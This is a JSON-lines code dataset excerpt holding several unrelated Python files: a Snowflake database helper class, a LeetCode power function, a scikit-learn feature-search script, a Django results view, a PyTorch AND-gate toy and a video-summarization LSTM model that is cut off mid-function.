df[\"LAST_QUERY_ID({ord})\".format(ord=query_order)][0]\n\n    def cancel_query(self, query_id):\n        \"\"\"Cancels the query associated with the given query id.\n\n        Args:\n            query_id: the id of the query you want to cancel\n        Returns:\n            NA\n        Raises:\n            SnowflakeException\n        \"\"\"\n        try:\n            self.engine.execute(r\"select SYSTEM$CANCEL_QUERY('{queryID}')\"\\\n                                .format(queryID=query_id))\n        except Exception:\n            raise SnowflakeException(\"Cannot cancel query_id:{}\"\\\n                                     .format(query_id))\n\n    def query_executor(self, query):\n        \"\"\"Executes the query.\n\n        Args:\n            query: query to execute\n        Returns:\n            NA\n        Raises:\n            NA\n        \"\"\"\n        self.engine.execute(query)\n\n    def sql_dataframe(self, query):\n        \"\"\"Executes the query and returns the queried results\n        in a pandas dataframe.\n\n        Args:\n            query: query to execute\n        Returns:\n            df_result: pandas DataFrame of the queried result\n        Raises:\n            NA\n        \"\"\"\n        try:\n            df_result = pd.read_sql(query, self.connection)\n        except TypeError:\n            df_result = pd.read_sql(query.replace(\"%\", \"%%\"), self.connection)\n        return df_result\n\n    def change_data_type(self, schema_name, table_name, column_name,\n                         data_type, db_name=\"BUSINESS_INTELLIGENCE\",\n                         need_confirmation=False, force=False, time_format='YYYY-MM-DD'):\n        \"\"\"Changes the data type of a column in a table.\n\n        Args:\n            db_name: name of the database in snowflake\n\n            schema_name: name of the schema in snowflake\n\n            table_name: name of the table in snowflake\n\n            column_name: name of the column\n\n            data_type: name of the desired data type in string\n\n            need_confirmation: prompts to ask if the change should be committed\n                when set to True\n            force: tries to force data type conversion then prompts to ask\n                if the rows with invalid values should be dropped\n            time_format: format of time the string value is in\n        Returns:\n            NA\n        Raises:\n            NA\n\n        Below is the mapping between your desired data type and the sql function\n        used for each one.\n\n        If the 'force' argument is set to 'True':\n            sql_functions = {\n                \"TIMESTAMP\":\"TRY_TO_TIMESTAMP\",\n                \"DATE\":\"TRY_TO_DATE\",\n                \"TIME\":\"TRY_TO_TIME\",\n                \"NUMBER\":\"TRY_TO_NUMBER\",\n                \"BINARY\":\"TRY_TO_BINARY\",\n                \"BOOLEAN\":\"TRY_TO_BOOLEAN\",\n                \"CHAR\":\"TO_CHAR\",\n                \"NUMERIC\":\"TRY_TO_NUMERIC\",\n                \"DECIMAL\":\"TRY_TO_DECIMAL\",\n                \"DOUBLE\":\"TRY_TO_DOUBLE\"\n            }\n        If 'force' is not given or is set to 'False':\n            sql_functions = {\n                \"TIMESTAMP\":\"TO_TIMESTAMP\",\n                \"DATE\":\"TO_DATE\",\n                \"TIME\":\"TO_TIME\",\n                \"NUMBER\":\"TO_NUMBER\",\n                \"BINARY\":\"TO_BINARY\",\n                \"BOOLEAN\":\"TO_BOOLEAN\",\n                \"CHAR\":\"TO_CHAR\",\n                \"NUMERIC\":\"TO_NUMERIC\",\n                \"DECIMAL\":\"TO_DECIMAL\",\n                \"DOUBLE\":\"TO_DOUBLE\"\n            }\n        \"\"\"\n        # use the appropriate database and schema\n        self.query_executor(\"USE SCHEMA {dn}.{sn}\".format(dn=db_name,\n                                                          sn=schema_name))\n\n        # add new column with prefix 'NEW_'\n        self.query_executor(\"ALTER TABLE {tn} ADD NEW_{cn} {dt}\"\\\n                            .format(tn=table_name,\n                                    cn=column_name,\n                                    dt=data_type))\n\n        # fetch the appropriate data type conversion sql function\n        function_name = self._get_data_type_conversion_function(data_type,\n                                                                force)\n\n        # update the newly created column; the concatenated literal is parenthesized\n        # so that .format() applies to the whole SQL string, not only the second fragment\n        if function_name in [\"TO_DATE\", \"TO_TIMESTAMP\"]:\n            self.query_executor(\n                (\"Update {tn} SET NEW_{cn} = {fn}({cn},\"\n                 \" '{date_format}')\")\n                .format(tn=table_name,\n                        cn=column_name,\n                        fn=function_name,\n                        date_format=time_format))\n        else:\n            self.query_executor(\"Update {tn} SET NEW_{cn} = {fn}({cn})\"\\\n                                .format(tn=table_name,\n                                        cn=column_name,\n                                        fn=function_name))\n\n        if force:\n            # check for count of null values in the new column\n            count = self.sql_dataframe(\n                \"SELECT COUNT(*) as COUNT FROM {tn} WHERE NEW_{cn} IS NULL\"\\\n                .format(tn=table_name,\n                        cn=column_name))[\"COUNT\"][0]\n            total_count = self.sql_dataframe(\n                \"SELECT COUNT(*) as COUNT FROM {tn}\"\\\n                .format(tn=table_name))[\"COUNT\"][0]\n            # ask for user input as to whether it's okay to drop those rows\n            question = \"\"\"\n            Would you like to drop {cnt} rows out of {tcnt} where the values of\n            NEW_{cn} are NULL to complete the data type conversion?\n            \\nAnswer 'yes' or 'no'\"\"\".format(cnt=count,\n                                            tcnt=total_count,\n                                            cn=column_name)\n            if need_confirmation:\n                answer = input(question)\n                if answer.lower() == \"yes\":\n                    self.query_executor(\n                        \"DELETE FROM {tn} WHERE NEW_{cn} IS NULL\".format(\n                            tn=table_name,\n                            cn=column_name))\n                elif answer.lower() == \"no\":\n                    self.query_executor(\"ALTER TABLE {tn} DROP COLUMN NEW_{cn}\"\\\n                                        .format(tn=table_name,\n                                                cn=column_name))\n                    raise ValueError(\n                        \"Any changes you've made have been rolled back.\")\n            else:\n                self.query_executor(\"DELETE FROM {tn} WHERE NEW_{cn} IS NULL\"\\\n                                    .format(tn=table_name,\n                                            cn=column_name))\n\n        if need_confirmation:\n            answer = input(\n                \"Does the NEW_{cn} column look good?\\nAnswer 'yes' or 'no'\"\\\n                .format(cn=column_name))\n            if answer.lower() == \"yes\":\n                pass\n            elif answer.lower() == \"no\":\n                self.query_executor(\n                    \"ALTER TABLE {tn} DROP COLUMN NEW_{cn}\".format(\n                        tn=table_name,\n                        cn=column_name))\n                raise ValueError(\n                    \"Any changes you've made have been rolled back.\")\n\n        # drop the old column\n        self.query_executor(\"ALTER TABLE {tn} DROP COLUMN {cn}\".format(\n            tn=table_name,\n            cn=column_name))\n\n        # rename the new column to replace the old column\n        self.query_executor(\"ALTER TABLE {tn} RENAME COLUMN NEW_{cn} to {cn}\".\\\n                            format(tn=table_name,\n                                   cn=column_name))\n\n\n    def _get_data_type_conversion_function(self, data_type, force):\n        \"\"\"Gets the sql function for the given data type.\n\n        Args:\n            data_type: name of the desired data type in string\n        Returns:\n            sql_function: sql_function in string\n        Raises:\n            NA\n        \"\"\"\n        #TODO add more sql functions for different data types\n        if force:\n            sql_functions = {\n                \"TIMESTAMP\":\"TRY_TO_TIMESTAMP\",\n                \"DATE\":\"TRY_TO_DATE\",\n                \"TIME\":\"TRY_TO_TIME\",\n                \"NUMBER\":\"TRY_TO_NUMBER\",\n                \"BINARY\":\"TRY_TO_BINARY\",\n                \"BOOLEAN\":\"TRY_TO_BOOLEAN\",\n                \"CHAR\":\"TO_CHAR\",\n                \"NUMERIC\":\"TRY_TO_NUMERIC\",\n                \"DECIMAL\":\"TRY_TO_DECIMAL\",\n                \"DOUBLE\":\"TRY_TO_DOUBLE\"\n            }\n        else:\n            sql_functions = {\n                \"TIMESTAMP\":\"TO_TIMESTAMP\",\n                \"DATE\":\"TO_DATE\",\n                \"TIME\":\"TO_TIME\",\n                \"NUMBER\":\"TO_NUMBER\",\n                \"BINARY\":\"TO_BINARY\",\n                \"BOOLEAN\":\"TO_BOOLEAN\",\n                \"CHAR\":\"TO_CHAR\",\n                \"NUMERIC\":\"TO_NUMERIC\",\n                \"DECIMAL\":\"TO_DECIMAL\",\n                \"DOUBLE\":\"TO_DOUBLE\"\n            }\n        return sql_functions[data_type.upper()]\n\n    def _create_custom_engine(self, db_name, schema_name):\n        \"\"\"Creates a custom engine to Snowflake.\n\n        Args:\n            db_name: name of the database in snowflake\n\n            schema_name: name of the schema in snowflake\n        Returns:\n            custom_engine: SQLAlchemy engine bound to the given database and schema\n        Raises:\n            NA\n        \"\"\"\n        url = URL(account=snowflake_creds[\"ACCOUNT\"],\n                  user=snowflake_creds[\"USER\"],\n                  password=snowflake_creds[\"PASSWORD\"],\n                  role=\"ACCOUNTADMIN\",\n                  database=db_name,\n                  schema=schema_name,\n                  numpy=True)\n        custom_engine = 
create_engine(url, poolclass=NullPool)\n return custom_engine\n\n def _table_exists(self, table_name, schema_name, db_name):\n \"\"\"Checks to see if table exists.\n\n Args:\n table_name: name of the table in snowflake\n Returns:\n table_exists: boolean result of whether table exists or not\n Raises:\n NA\n \"\"\"\n self.query_executor(\"USE DATABASE {}\".format(db_name))\n df = self.sql_dataframe(\n \"SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'\")\n df = df.loc[df.TABLE_SCHEMA==schema_name]\n if table_name in df.TABLE_NAME.unique():\n return True\n else:\n return False\n\n def _close_connection(self):\n \"\"\"Closes the open connection to Snowflake db.\n\n Args:\n NA\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n self.connection.close()\n\n def _drop_table(self, db_name, schema_name, table_name):\n \"\"\"Drops a table from Snowflake db.\n\n Args:\n NA\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n self.query_executor(\"USE SCHEMA {}.{}\".format(db_name,schema_name))\n self.query_executor(\"DROP TABLE {}\".format(table_name))\n\n def _grant_permission(self, db_name, schema_name, **kwargs):\n \"\"\"Grants permission to database objects.\n\n Args:\n db_name:\n\n schema_name:\n\n table_name:\n\n role_name:\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n if \"role\" in kwargs:\n role = kwargs[\"role\"]\n else:\n role = \"BI_READ_ONLY\"\n\n self.query_executor(\"USE DATABASE {}\".format(db_name))\n self.query_executor(\n \"grant usage on schema {} to role {};\".format(schema_name, role))\n self.query_executor(\n \"grant all on all tables in schema {} to role {};\".format(\n schema_name, role))\n\n def _format_for_load(self, df):\n \"\"\"Formats the Pandas DataFrame for database load operation\n\n Args:\n df: Pandas DataFrame for formatting\n Returns:\n df: Formatted Pandas DataFrame\n Raises:\n NA\n \"\"\"\n try:\n datetime_cols = [x for x in df.columns if \"_date\" in x.lower()]\n except AttributeError as e:\n new_header = df.iloc[0]\n df = df[1:]\n df.columns = new_header\n datetime_cols = [x for x in df.columns if \"_date\" in x.lower()]\n except:\n raise ValueError(\"check your s3 object input\")\n for col in datetime_cols:\n df[col] = pd.to_datetime(df[col], errors = 'coerce')\n # if all values for the given column is na, then set it to string\n for col in df.columns:\n if df[col].isnull().all():\n df[col] = df[col].astype(str)\n return df\n\n def _get_bucket(self, filepath):\n \"\"\"Returns the relevant information regarding the s3 bucket in use\n\n Args:\n filepath: path to the flat file stored in s3\n Returns:\n dict_to_return: dictionary storing relevant information\n Raises:\n NA\n \"\"\"\n import inspect\n s3_buckets = S3Buckets()\n attributes = inspect.getmembers(s3_buckets,\n lambda a:not(inspect.isroutine(a)))\n attr_dict = {}\n for i in range(2, len(attributes)):\n attr_dict[attributes[i][1][\"prefix\"]] = i\n\n prefix = [prefix for prefix in attr_dict.keys() \\\n if(prefix in filepath)]\n if prefix:\n prefix = prefix[0]\n dict_to_return = attributes[attr_dict[prefix]][1]\n else:\n raise SnowflakeException(\"invalid filepath: not supported bucket.\"\\\n \"Contact BI to add your s3 bucket to s3_bucket configuration file\")\n return dict_to_return\n","sub_path":"bi_db/snowflake_connection.py","file_name":"snowflake_connection.py","file_ext":"py","file_size_in_byte":30237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"373596819","text":"# If n = 0, then return 1\n# If n = 1, then return x\n# Otherwise, x^n = x^n/2 * 
x ^n/2 if n is even\n#            x^n = x^((n-1)/2) * x^((n-1)/2) * x if n is odd\nclass Solution:\n    def myPow(self, x: float, n: int) -> float:\n        def calculatePow(x, n):\n            if n == 0:\n                return 1\n            elif n == 1:\n                return x\n            else:\n                m = int(n / 2)\n                y = calculatePow(x, m)\n                if n % 2 == 0:\n                    return y * y\n                else:\n                    return y * y * x\n\n        if n < 0:\n            return 1 / calculatePow(x, -n)\n        else:\n            return calculatePow(x, n)\n","sub_path":"面试-LeetCode题/基础算法5-分治法/LeetCode50(Pow)/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"298314706","text":"from sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.multiclass import OneVsOneClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nimport pandas as pd\nimport numpy as np\nimport itertools\nimport sys\nsys.path.insert(0, 'General_Functions_Code')\nimport PerMinData as pmd\nimport combine_labels_features as clf\nimport label_to_array as lta\n\nif __name__ == \"__main__\":\n    training_df = clf.combine_files('New_Processed_Data/train_label_preprocessed3.csv',\n                                    'New_Processed_Data/train_feat_preprocessed2.csv')\n    validation_df = clf.combine_files('New_Processed_Data/test_label_preprocessed3.csv',\n                                      'New_Processed_Data/test_feat_preprocessed2.csv')\n    test_df = clf.combine_files('New_Processed_Data/online_test_label_preprocessed3.csv',\n                                'New_Processed_Data/online_test_feat_preprocessed2.csv')\n\n    features = ['HR', 'BR', 'Posture', 'Activity', 'PeakAccel',\n                'BRAmplitude', 'ECGAmplitude', 'ECGNoise', 'HRConfidence',\n                'VerticalMin', 'VerticalPeak', 'LateralMin', 'LateralPeak',\n                'SagittalMin', 'SagittalPeak', 'AuxADC1', 'AuxADC2',\n                'AuxADC3']\n    feature_combinations = []\n    for k in range(1, len(features)):\n        feature_combinations += list(itertools.combinations(features, k))\n    feature_combinations = [list(x) for x in feature_combinations]\n\n    # features = ['HR', 'BR', 'Posture', 'Activity', 'PeakAccel',\n    #             'BRAmplitude', 'ECGAmplitude', 'ECGNoise', 'HRConfidence',\n    #             'VerticalMin', 'VerticalPeak', 'LateralMin', 'LateralPeak',\n    #             'SagittalMin', 'SagittalPeak', 'AuxADC1', 'AuxADC2',\n    #             'AuxADC3']\n    # Activity, PeakAccel, ECGAmplitude, ECGNoise, VerticalMin, LateralMin, LateralPeak, SagittalMin, SagittalPeak\n\n    label_to_number_dict = {'lift': 0,\n                            'lying': 1,\n                            'sitting': 2,\n                            'snowboarding': 3,\n                            'standing': 4,\n                            'towlift': 5}\n\n    accuracy_list = []\n    for features in feature_combinations:\n        training_array = training_df[features].values\n        training_labels = pd.read_csv('New_Processed_Data/train_label_preprocessed3.csv')['Label'].values\n        averaged_t_array = pmd.average_per_minute(training_array)\n        averaged_t_labels = np.array([label_to_number_dict[x] for x in pd.read_csv('New_Processed_Data/train_label_preprocessed2.csv')['activity'].values])\n\n        validation_array = validation_df[features].values\n        validation_labels = pd.read_csv('New_Processed_Data/test_label_preprocessed3.csv')['Label'].values\n        averaged_v_array = pmd.average_per_minute(validation_array)\n        averaged_v_labels = np.array([label_to_number_dict[x] for x in pd.read_csv('New_Processed_Data/test_label_preprocessed2.csv')['activity'].values])\n\n        test_array = test_df[features].values\n        test_labels = pd.read_csv('New_Processed_Data/online_test_label_preprocessed3.csv')['Label'].values\n        averaged_test_array = pmd.average_per_minute(test_array)\n        averaged_test_labels = np.array([label_to_number_dict[x] for x in 
pd.read_csv('New_Processed_Data/online_test_label_preprocessed2.csv')['activity'].values])\n\n X = averaged_t_array\n Y = averaged_t_labels\n v_X = averaged_v_array\n v_Y = averaged_v_labels\n\n\n\n prediction = OneVsRestClassifier(estimator=LinearSVC(random_state=5, max_iter=256)).fit(X, Y).predict(v_X) # i = 5, j = 256\n # prediction = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(128, 12), random_state=i, max_iter=1000).fit(X, Y).predict(v_X) # (128, 12), i = 13, 1e-1\n # prediction = OneVsOneClassifier(LinearSVC(random_state=i, max_iter=20000)).fit(X, Y).predict(v_X) # 763, i=0\n\n count = 0\n for j in range(len(v_Y)):\n if v_Y[j] == prediction[j]:\n count += 1\n accuracy_list.append(count / len(v_Y))\n print(max(accuracy_list))\n print(np.array(accuracy_list))\n print(max(accuracy_list))\n print(accuracy_list.index(max(accuracy_list)))\n","sub_path":"Tim/SKLearnStuff.py","file_name":"SKLearnStuff.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"278096140","text":"from json import dumps as json_dumps\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import QueryDict\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import get_object_or_404, render\n\nfrom validator.doi import get_doi_for_validation\nfrom validator.forms import PublishingForm, ResultsSortingForm\nfrom validator.models import ValidationRun\nfrom validator.validation.globals import METRICS\nfrom validator.validation.graphics import get_dataset_combis_and_metrics_from_files\n\nfrom collections import OrderedDict\n\n\n@login_required(login_url='/login/')\ndef user_runs(request):\n current_user = request.user\n\n sorting_form, order = ResultsSortingForm.get_sorting(request)\n\n page = request.GET.get('page', 1)\n cur_user_runs = (\n ValidationRun.objects.filter(user=current_user)\n .order_by(order)\n )\n\n paginator = Paginator(cur_user_runs, 10)\n try:\n paginated_runs = paginator.page(page)\n except PageNotAnInteger:\n paginated_runs = paginator.page(1)\n except EmptyPage:\n paginated_runs = paginator.page(paginator.num_pages)\n\n context = {\n 'myruns': paginated_runs,\n 'sorting_form': sorting_form,\n }\n return render(request, 'validator/user_runs.html', context)\n\n\ndef result(request, result_uuid):\n val_run = get_object_or_404(ValidationRun, pk=result_uuid)\n if(request.method == 'DELETE'):\n ## make sure only the owner of a validation can delete it (others are allowed to GET it, though)\n if(val_run.user != request.user):\n return HttpResponse(status=403)\n\n ## check that our validation can be deleted; it can't if it already has a DOI\n if(not val_run.is_unpublished):\n return HttpResponse(status=405) #405\n\n val_run.delete()\n return HttpResponse(\"Deleted.\", status=200)\n\n elif(request.method == 'PATCH'):\n ## make sure only the owner of a validation can change it (others are allowed to GET it, though)\n\n if(val_run.user != request.user):\n return HttpResponse(status=403)\n\n patch_params = QueryDict(request.body)\n\n if 'save_name' in patch_params:\n ## check that our validation's name can be changed'; it can't if it already has a DOI\n if (not val_run.is_unpublished):\n return HttpResponse('Validation has been published', status=405)\n\n save_mode = patch_params['save_name']\n\n if save_mode != 'true':\n return HttpResponse(\"Wrong action parameter.\", status=400)\n\n 
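# safe to rename here: the unpublished check above already rejected runs with a DOI\n            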
val_run.name_tag = patch_params['new_name']\n val_run.save()\n\n return HttpResponse(\"Changed.\", status=200)\n\n\n if 'archive' in patch_params:\n archive_mode = patch_params['archive']\n\n if not ((archive_mode == 'true') or (archive_mode == 'false')):\n return HttpResponse(\"Wrong action parameter.\", status=400)\n\n val_run.archive(unarchive = (archive_mode == 'false'))\n return HttpResponse(\"Changed.\", status=200)\n\n if 'extend' in patch_params:\n extend = patch_params['extend']\n\n if extend != 'true':\n return HttpResponse(\"Wrong action parameter.\", status=400)\n\n val_run.extend_lifespan()\n return HttpResponse(val_run.expiry_date, status=200)\n\n if 'publish' in patch_params:\n publish = patch_params['publish']\n\n # check we've got the action set correctly\n if publish != 'true':\n return HttpResponse(\"Wrong action parameter.\", status=400)\n\n # check that the publication parameters are valid\n pub_form = PublishingForm(data=patch_params, validation=val_run)\n if not pub_form.is_valid():\n # if not, send back an updated publication form with errors set and http code 420 (picked up in javascript)\n return render(request, 'validator/publishing_dialog.html', {'publishing_form': pub_form, 'val': val_run}, status=420)\n\n try:\n get_doi_for_validation(val_run, pub_form.pub_metadata)\n except Exception as e:\n m = getattr(e, 'message', repr(e))\n return HttpResponse(m, status=400)\n\n return HttpResponse(\"Published.\", status=200)\n\n return HttpResponse(\"Wrong action parameter.\", status=400)\n\n # by default, show page\n else:\n ## tell template whether it's the owner of the validation - to show action buttons\n is_owner = (val_run.user == request.user)\n\n ## TODO: get time in format like '2 minutes', '5 hours'\n run_time = None\n if val_run.end_time is not None:\n run_time = val_run.end_time - val_run.start_time\n run_time = (run_time.days * 1440) + (run_time.seconds // 60)\n\n error_rate = 1\n if val_run.total_points != 0:\n error_rate = (val_run.total_points - val_run.ok_points) / val_run.total_points\n\n pairs, triples, metrics, ref0_config = get_dataset_combis_and_metrics_from_files(val_run)\n combis = OrderedDict(sorted({**pairs, **triples}.items()))\n # the publication form is only needed by the owner; if we're displaying for another user, avoid leaking user data\n pub_form = PublishingForm(validation=val_run) if is_owner else None\n\n metrics = OrderedDict(sorted([(v, k) for k, v in metrics.items()]))\n\n context = {\n 'is_owner': is_owner,\n 'val' : val_run,\n 'error_rate' : error_rate,\n 'run_time': run_time,\n 'metrics': metrics,\n 'combis': combis,\n 'json_metrics': json_dumps(METRICS),\n 'publishing_form': pub_form\n }\n\n return render(request, 'validator/result.html', context)\n","sub_path":"validator/views/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"538736312","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 26 17:24:24 2020\r\n\r\n@author: Harsh Chaudhary\r\n\"\"\"\r\n\r\nimport torch\r\nfrom torch import nn, optim\r\n\r\n\r\ndata = torch.Tensor([[0, 0], [0, 1], [1, 0], [1, 1]])\r\nlabel = torch.Tensor([[0], [0], [0], [1]])\r\n\r\nclass AND_GATE(nn.Module):\r\n def __init__(self):\r\n super(AND_GATE, self).__init__()\r\n \r\n self.fc1 = nn.Linear(2, 1)\r\n #self.fc2 = nn.Linear(3, 1)\r\n \r\n def forward(self, x):\r\n x = torch.sigmoid(self.fc1(x))\r\n #x = self.fc2(x)\r\n return x\r\n\r\nmodel = 
AND_GATE()\r\ncriterion = nn.MSELoss()\r\noptimizer = optim.SGD(model.parameters(), lr = 1)\r\n\r\nepochs = 1000\r\nfor e in range(epochs):\r\n train_loss = 0\r\n\r\n output = model(data)\r\n loss = criterion(output, label)\r\n \r\n train_loss += loss.item()\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n \r\n if e%100==0:\r\n print('epoch {}: Training loss: {:.4f}'.format(e+1, train_loss))\r\n\r\ndef test(a, b):\r\n input_values = torch.Tensor([[a, b]])\r\n output = model(input_values)\r\n print(list(map(fun, output)))\r\n\r\ndef fun(x):\r\n if x>0.5:\r\n return 1\r\n return 0\r\n","sub_path":"AND_GATE.py","file_name":"AND_GATE.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"574170228","text":"# -*- coding: utf-8 -*-\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nfrom .lstmcell import StackedLSTMCell\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\n# class sLSTM(nn.Module):\n# def __init__(self, input_size, hidden_size, num_layers=2):\n# \"\"\"Scoring LSTM\"\"\"\n# super().__init__()\n#\n# self.lstm = nn.LSTM(input_size, hidden_size, num_layers, bidirectional=True)\n# self.out = nn.Sequential(\n# nn.Linear(hidden_size * 2, 1), # bidirection => scalar\n# nn.Sigmoid())\n#\n# def forward(self, features, difference_attention, init_hidden=None):\n# \"\"\"\n# Args:\n# features: [seq_len, 1, 100] (compressed pool5 features)\n# Return:\n# scores [seq_len, 1]\n# \"\"\"\n# self.lstm.flatten_parameters()\n#\n# # [seq_len, 1, hidden_size * 2]\n# features, (h_n, c_n) = self.lstm(features)\n#\n# # [seq_len, 1]\n# scores = self.out(features.squeeze(1))\n# return scores\n\nclass sLSTM(nn.Module):\n def __init__(self, input_size, hidden_size=256, num_layers=2, m=4, video_type='summe'):\n super().__init__()\n self.out = nn.Sigmoid()\n\n if video_type == 'summe':\n self.nframes = 9721\n else:\n self.nframes = 19406\n\n self.fc2 = nn.Linear(self.nframes, self.nframes)\n self.fc2.weight.data.normal_(0, 1)\n if self.fc2.bias.data is not None:\n self.fc2.bias.data.zero_()\n\n self.fc_last = nn.Sequential(\n self.fc2,\n nn.Sigmoid())\n\n self.csnet_objects = CSNET(input_size, hidden_size, num_layers, m, video_type)\n self.csnet_places = CSNET(input_size, hidden_size, num_layers, m, video_type)\n self.out = nn.Sigmoid()\n\n def forward(self, features, places365_features, difference_attention):\n obj_cm, obj_sm, obj_dt = self.csnet_objects(features, difference_attention['objects'])\n places365_cm, places365_sm, places365_dt = self.csnet_places(places365_features, difference_attention['places'])\n\n #intermmediate fusion\n # sum scores\n cm_scores = obj_cm + places365_cm\n sm_scores = obj_sm + places365_sm\n # sum attentions\n difference_attention = obj_dt + places365_dt\n scores = self.out(sm_scores + cm_scores + difference_attention)\n rest = torch.zeros(int(self.nframes - scores.size(0))).to(device)\n scores = torch.cat((scores, rest))\n self.fc2.weight.data[features.size(0):, :] = torch.zeros(self.fc2.weight.data[features.size(0):, :].size())\n scores = self.fc_last(scores)\n scores = scores[0:features.size(0)]\n return scores.unsqueeze(1)\n\n\nclass CSNET(nn.Module):\n def __init__(self, input_size, hidden_size=256, num_layers=2, m=4, video_type='summe'):\n \"\"\"Scoring LSTM\"\"\"\n super().__init__()\n self.m = m\n self.lstm = nn.LSTM(input_size, hidden_size, num_layers, bidirectional=True)\n self.fc = nn.Linear(hidden_size * 2, 1) # 
bidirection => scalar\n\n\n def forward(self, features, difference_attention):\n self.lstm.flatten_parameters()\n\n # [seq_len, 1, hidden_size * 2]\n # strides stream\n sm_idxs = self.compute_sm(features)\n sm_idxs = self.flatten(list(sm_idxs.values()))\n\n sm_scores = torch.zeros(features.size(0)).to(device)\n sm = features[sm_idxs]\n sm, (h_n, c_n) = self.lstm(sm)\n sm = self.fc(sm)\n for idx, out in zip(sm_idxs, sm):\n sm_scores[idx] = out\n\n # chunks stream\n cm_idxs = self.compute_cm(features)\n cm_idxs = self.flatten(list(cm_idxs.values()))\n\n cm_scores = torch.zeros(features.size(0)).to(device)\n cm = features[cm_idxs]\n cm, (h_n, c_n) = self.lstm(cm)\n cm = self.fc(cm)\n for idx, out in zip(cm_idxs, cm):\n cm_scores[idx] = out\n # cm_scores.unsqueeze_(1)\n difference_attention = difference_attention.squeeze(1)\n return cm_scores, sm_scores, difference_attention\n\n # stride streams\n # [Eq. 4]\n def compute_sm(self, image_features):\n T = image_features.size(0)\n M = k = self.m\n sm_idxs = {}\n for m in range(M):\n end = m + T - k\n idxs = []\n for i in range(0, T):\n val = i * k + m\n if val >= end:\n idxs.append(end)\n break\n else:\n idxs.append(val)\n sm_idxs[m] = idxs\n return sm_idxs\n\n # chunk streams\n # [Eq. 3]\n def compute_cm(self, image_features):\n T = image_features.size(0)\n n_chunks = self.m\n cm_idxs = {}\n for m in range(1, n_chunks + 1):\n fraction = torch.tensor(T / n_chunks)\n start = (m - 1) * torch.ceil(fraction)\n end = m * torch.ceil(fraction) - 1\n idxs = []\n for i in range(T):\n if i >= start and i <= end:\n idxs.append(i)\n # print('m {}, start {}, end {}'.format(m, start, end))\n # print(idxs)\n cm_idxs[m] = idxs\n return cm_idxs\n\n def flatten(self, t):\n return [item for sublist in t for item in sublist]\n\n\nclass eLSTM(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers=2):\n \"\"\"Encoder LSTM\"\"\"\n super().__init__()\n\n self.lstm = nn.LSTM(input_size, hidden_size, num_layers)\n\n self.linear_mu = nn.Linear(hidden_size, hidden_size)\n self.linear_var = nn.Linear(hidden_size, hidden_size)\n\n def forward(self, frame_features):\n \"\"\"\n Args:\n frame_features: [seq_len, 1, hidden_size]\n Return:\n last hidden\n h_last [num_layers=2, 1, hidden_size]\n c_last [num_layers=2, 1, hidden_size]\n \"\"\"\n self.lstm.flatten_parameters()\n _, (h_last, c_last) = self.lstm(frame_features)\n\n return (h_last, c_last)\n\n\nclass dLSTM(nn.Module):\n def __init__(self, input_size=2048, hidden_size=2048, num_layers=2):\n \"\"\"Decoder LSTM\"\"\"\n super().__init__()\n\n self.lstm_cell = StackedLSTMCell(num_layers, input_size, hidden_size)\n self.out = nn.Linear(hidden_size, input_size)\n\n def forward(self, seq_len, init_hidden):\n \"\"\"\n Args:\n seq_len (int)\n init_hidden\n h [num_layers=2, 1, hidden_size]\n c [num_layers=2, 1, hidden_size]\n Return:\n out_features: [seq_len, 1, hidden_size]\n \"\"\"\n\n batch_size = init_hidden[0].size(1)\n hidden_size = init_hidden[0].size(2)\n\n x = Variable(torch.zeros(batch_size, hidden_size)).to(device)\n h, c = init_hidden # (h_0, c_0): last state of eLSTM\n\n out_features = []\n for i in range(seq_len):\n # last_h: [1, hidden_size] (h from last layer)\n # last_c: [1, hidden_size] (c from last layer)\n # h: [2=num_layers, 1, hidden_size] (h from all layers)\n # c: [2=num_layers, 1, hidden_size] (c from all layers)\n (last_h, last_c), (h, c) = self.lstm_cell(x, (h, c))\n x = self.out(last_h)\n out_features.append(last_h)\n # list of seq_len '[1, hidden_size]-sized Variables'\n return 
out_features\n\n\nclass VAE(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers=2):\n super().__init__()\n self.e_lstm = eLSTM(input_size, hidden_size, num_layers)\n self.d_lstm = dLSTM(input_size, hidden_size, num_layers)\n\n self.softplus = nn.Softplus()\n\n def reparameterize(self, mu, log_variance):\n \"\"\"Sample z via reparameterization trick\n Args:\n mu: [num_layers, hidden_size]\n log_var: [num_layers, hidden_size]\n Return:\n h: [num_layers, 1, hidden_size]\n \"\"\"\n std = torch.exp(0.5 * log_variance)\n\n # e ~ N(0,1)\n epsilon = Variable(torch.randn(std.size())).to(device)\n\n # [num_layers, 1, hidden_size]\n return (mu + epsilon * std).unsqueeze(1)\n\n def forward(self, features):\n \"\"\"\n Args:\n features: [seq_len, 1, hidden_size]\n Return:\n h: [2=num_layers, 1, hidden_size]\n decoded_features: [seq_len, 1, 2048]\n \"\"\"\n seq_len = features.size(0)\n\n # [num_layers, 1, hidden_size]\n h, c = self.e_lstm(features)\n\n # [num_layers, hidden_size]\n h = h.squeeze(1)\n\n # [num_layers, 